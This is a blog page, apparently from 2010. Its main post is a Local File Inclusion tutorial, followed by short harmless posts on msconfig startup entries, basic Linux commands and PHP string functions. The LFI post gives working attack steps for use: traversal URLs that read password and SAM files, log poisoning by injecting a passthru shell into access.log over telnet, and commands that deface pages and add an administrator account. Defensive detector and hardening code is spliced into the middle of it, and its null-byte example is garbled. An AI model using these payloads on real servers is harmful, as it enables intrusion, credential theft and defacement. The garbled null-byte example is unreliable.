
Thursday 7 October 2010

Local File Inclusion [LFI] tutorial for beginners

Before, I have written an article on remote file inclusion (RFI), and this time I am writing about LFI. So what is LFI? It is similar to RFI, except that we include a file that is already on the server rather than one fetched from another server. Sometimes the allow_url_include setting is set to off on the webserver (On is by default), or there is some kind of filter that checks for things like http:// or www (though we can bypass these things). In that situation, we may have to use LFI to own the server.

So let's again take the example of a vulnerable script:

<?php
    if (IsSet($_GET['page']))
        include($_GET['page']);
?>

Here we can see that the script doesn't check which file is to be included, and hence we are free to include any file by changing the value of the 'page' GET variable.

    Eg: www.victim.com/index.php?page=profile.php

Let's put a quote at the end of the URL and we see a pretty nice error like this:

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2

Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

So the script can't find the file profile.php' and hence errors out. Now, let's try to include sensitive files that might be present on the webserver.

    Eg: www.victim.com/index.php?page=../../boot.ini    //boot.ini file in windoze
        http://localhost/test.php?page=../../windows/system32/drivers/etc/hosts    //hosts info file
        http://localhost/test.php?page=../../../../etc/passwd    //on Linux
        http://localhost/test.php?page=../../windows/repair/sam    //backup SAM file

        etc. and etc.

    Two ../ shift the current directory two levels up, like cd ../.. at the command prompt. You can watch the error message to find out how many such ../ you need. But if you don't know how many to use, or don't want to waste time finding out, you can simply put plenty of them, around 10, to view files like boot.ini or /etc/passwd: once the path has reached the root folder such as C:\, the extra ../ can't go any further up.

So now you know how to include sensitive files on the webserver. But what if we need a shell on the server?
Then we write some error into the logs of the webserver that contains PHP code:
    <?php passthru($_GET['cmd']); ?> or something similar to this. PHP offers functions like system(), shell_exec(), exec(), etc. for executing system-level commands.

The problem with injecting malicious code into log files is that we need to inject it either through telnet or using a script. I have seen many sites with Perl scripts for this purpose. Search for them.
What we do is inject the code into the log files of Apache, such as access.log, apache_error.log or php_error.log, or any other log file. Then we include that same log file through the vulnerable script and execute system commands.
    On my WampServer, I have:

        http://localhost/test.php?page=../logs/access.log   //the log with site access info.

There are various places you might want to look at, and I'll list them at the end of the tutorial.
Here I am going to use telnet to write the PHP code into the access.log file as an error.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1
   

Now this gets saved in the access.log file on my webserver, and I include it through the vulnerable script:

    So we do:    http://localhost/test.php?page=../logs/access.log&cmd=dir    //lists the directory
    Now you can do whatever mischief you like by writing cmd=any_system_level_command, such as:
        ls -lia
        echo "HaCKeD BY sam207">index.*
        net user sam207 mypass /add
        net localgroup administrator sam207 /add

and any other commands you like.
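A detector for the traces this technique leaves behind, as an added example that is not part of the original post: it scans Apache access-log lines for a PHP tag in the request line (log poisoning) and for directory traversal or a null byte in the page parameter (the include itself). The sample log lines are constructed, and scanAccessLog() is a name chosen for this example.

```php
<?php
// Added example, not from the original post: scan access-log lines for the
// two artefacts of LFI plus log poisoning. The log lines below are constructed.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
127.0.0.1 - - [07/Oct/2010:10:00:01 +0000] "GET /index.php?page=profile HTTP/1.1" 200 512
127.0.0.1 - - [07/Oct/2010:10:00:02 +0000] "GET /<? passthru($_GET['cmd']); ?> HTTP/1.1" 404 210
127.0.0.1 - - [07/Oct/2010:10:00:03 +0000] "GET /test.php?page=../logs/access.log&cmd=dir HTTP/1.1" 200 9001
127.0.0.1 - - [07/Oct/2010:10:00:04 +0000] "GET /test.php?page=..%2F..%2Fboot.ini HTTP/1.1" 200 300
LOG;

/** Return one finding per suspicious line, keyed by 1-based line number. */
function scanAccessLog(string $log): array
{
    $findings = [];
    foreach (explode("\n", trim($log)) as $i => $line) {
        // Pull the request target out of the quoted request line.
        if (!preg_match('/"(?:GET|POST|HEAD) (.+?) HTTP\//', $line, $m)) {
            continue;
        }
        // Decode %2F, %00 and friends so encoded variants are matched too.
        $target = rawurldecode($m[1]);
        if (preg_match('/<\?(?:php\b|=|\s)/i', $target)) {
            $findings[$i + 1] = 'PHP tag in request line (possible log poisoning)';
        } elseif (preg_match('/(?:^|[?&])page=[^&]*(?:\.\.[\/\\\\]|\x00)/', $target)) {
            $findings[$i + 1] = 'traversal or null byte in page parameter';
        }
    }
    return $findings;
}

foreach (scanAccessLog(SAMPLE_LOG) as $lineNo => $reason) {
    echo "line $lineNo: $reason\n";
}
```

Lines 2, 3 and 4 of the sample are flagged; line 1 is a normal request and is not.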
That pretty much describes owning the server. Now some extras I thought I'd include here:
    Some developers think they can ensure that only a valid PHP file gets included by doing something like this:

        <?php
            if (IsSet($_GET['page']))
                include($_GET['page'].".php");
        ?>

        // so it looks like it will include only PHP files, by forcing the .php extension at the end. But if we add a question mark (?) or a null byte, by doing http://localhost/test.php?page=access.log, it becomes something like:
                include("access.log.php");    //now the script drops everything after the null byte, and the file access.log is successfully included. You can then carry on with your usual pwnage.
        Note: don't try to inject PHP code by sending the malicious HTTP request through your browser. It will be URL-encoded and you won't be able to exploit it.
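As an added example (not code from the original post), here is a hardened replacement for both the bare include($_GET['page']) at the top of the tutorial and the ".php"-appending variant just above. It validates the page name before any concatenation, checks it against an allowlist, and confirms that the resolved path still sits under the pages directory. The pages directory, the allowlist entries and resolvePage() are assumptions of this example.

```php
<?php
// Added example, not from the original post: a safe page include.
// Two independent controls: an allowlist of page names, and a realpath()
// check that the resolved file lives under PAGES_DIR. Paths are assumptions.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'profile', 'contact'];

function resolvePage(?string $page): ?string
{
    // Only a plain page name may pass: no slashes, dots or null bytes,
    // so neither ../ nor a %00 can reach the ".php" concatenation below.
    if ($page === null || !preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return null;
    }
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    $candidate = realpath(PAGES_DIR . '/' . $page . '.php');
    $base = realpath(PAGES_DIR);
    // Defence in depth: even if the allowlist is edited carelessly later,
    // the resolved path must still be inside PAGES_DIR.
    if ($candidate === false || $base === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

$target = resolvePage($_GET['page'] ?? 'home');
if ($target === null) {
    // Fail closed, and keep display_errors off in production so the
    // path-revealing warnings shown earlier never reach the client.
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```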

Now finally, the places you might want to look at during LFI:
    etc/passwd
    etc/group
    etc/security/passwd
    etc/security/group
    apache/logs/access.log
    apache/logs/error.log
    var/log/access.log
    etc.
You can find many other places to look at during your LFI by searching the internet. Be creative and use your brain.
Hope you like it. Please comment.
With Regards~
sam207


Saturday 2 October 2010

Removing the unwanted programs from startup

Many programs such as messengers and other utilities attach themselves to the startup. As the number of startup items in your system grows, the startup process gradually becomes slower. Also, unnecessary programs and even viruses and worms may be in the startup list, so this can come in handy when you need to speed up your system.

There are different locations from which a program can run at startup. You can refer to my previous post HERE for startup-related information.

All the startup item entries are listed in the Microsoft System Configuration utility, msconfig, which can be opened by running the msconfig command from the Run box. Switch to the Startup tab in the msconfig window; it lists all the programs and shortcuts that run in the background at startup.

From here, you can remove the unnecessary programs and virus/worm startup entries by unchecking them. Just be careful to work correctly: many viruses and worms use filenames similar to those of Windows system files, so take care while editing the startup list here.

Have fun. :)


Basic Linux Commands For Beginners [Part I]

I thought I would share the different Linux commands from basic to advanced so that new Linux users benefit, so I'm starting this post and I'll continue to post more commands. This is the first one, with the most basic commands to use in the terminal.

Note that Linux commands are case-sensitive, so be careful with the case while executing the commands.

cd

Command to change directory

cd /home: This changes the current working directory to /home. The leading '/' indicates a path relative to the root, so the directory will be changed to "/home" no matter which directory you are in when you execute this command.

cd samar: This changes the current working directory to samar, relative to the current location which is "/home". The full path of the new working directory is "/home/samar".

cd ..: This moves to the parent directory of the current directory. Hence, after executing this command, our new directory will be "/home".

cd ~: This changes the current directory to the user's home directory, which is "/home/samar" for the user "samar". The ~ indicates the home directory of the currently logged-in user.

ls

Lists the files and folders present in the current directory

ls: Lists the files and folders in the current working directory except those starting with ., showing only the file names.

Using switches such as ls -lia or ls -al outputs more information, such as ownership and permission (chmod) info, for the files in the current directory.

cat

Concatenates files and sends the contents to standard output. This command comes in handy in many cases, and with redirection we can send the contents to other outputs such as files.

cat /etc/passwd: sends the content of the file "/etc/passwd" to the standard output, i.e. the screen.

cat /etc/passwd>/home/samar/Desktop/pass.txt: writes the content of the "/etc/passwd" file to the "/home/samar/Desktop/pass.txt" file.

cat file1 file2 > file3.txt: concatenates the content of "file1" with that of "file2" and writes the result to "file3.txt".

For now, I will leave you to do some study of these commands. You can use the man pages or info to find out more about them (I'll leave that for you to research). Have fun. :)


Wednesday 22 September 2010

Replacing All Instances of a Word in string [PHP]

PHP offers a useful function called str_replace() that replaces every instance of a word in a string. This function takes three compulsory arguments and one optional argument.

The first argument is the string to search for, the second the replacement value and the third the target string. The function returns the modified string.

Example:

<?php
function replace($string)
{
    return str_replace("dog", "samar", $string);
}

$str = "I am dog so you call me dog";
echo $str;
echo "\n" . replace($str); // call the replace function
?>

Output:
I am dog so you call me dog
I am samar so you call me samar

Now, what if you want to work with an array of words to replace, for instance in censoring tasks? You can write PHP like the following to perform that task.

<?php
function badword_censor($string)
{
    $string = strtolower($string);
    // add words as per your requirement
    $badwords = array("fuck","bitch","cunt","faggot","penis","vagina","dick","pussy");
    $string = str_replace($badwords, "*censored*", $string);
    return $string;
}

$str = "Fuck you bitch.";
//echo $str;
echo "\n" . badword_censor($str);
?>

Output:
*censored* you *censored*.

Also, refer to str_ireplace(), the case-insensitive version of this function.
Hope this helps. :)

Edit: Thanks to cr4ck3r for the comments. Updated the post... :)


Working with text case of PHP string

PHP provides a number of functions for working with the case of a string. All of these functions take the source string as their argument and return the modified string. The original source string is not modified by any of them.

The PHP functions for working with case are:
strtolower() - Converts the entire string to lowercase

strtoupper() - Converts the entire string to uppercase

ucfirst() - Converts the first letter of the string to uppercase

ucwords() - Converts the first letter of every word in the string to uppercase

<?php
//usage of ucfirst() function
$str = "i am samar";
$str = ucfirst($str);
echo $str;
?>

Output: I am samar
<?php
//usage of ucwords() function
$str = "i am samar";
$str = ucwords($str);
echo $str;
?>

Output: I Am Samar
<?php
//usage of strtoupper() function
//similarly use strtolower() function
$str = "i am samar";
$str = strtoupper($str);
echo $str;
?>

Output: I AM SAMAR
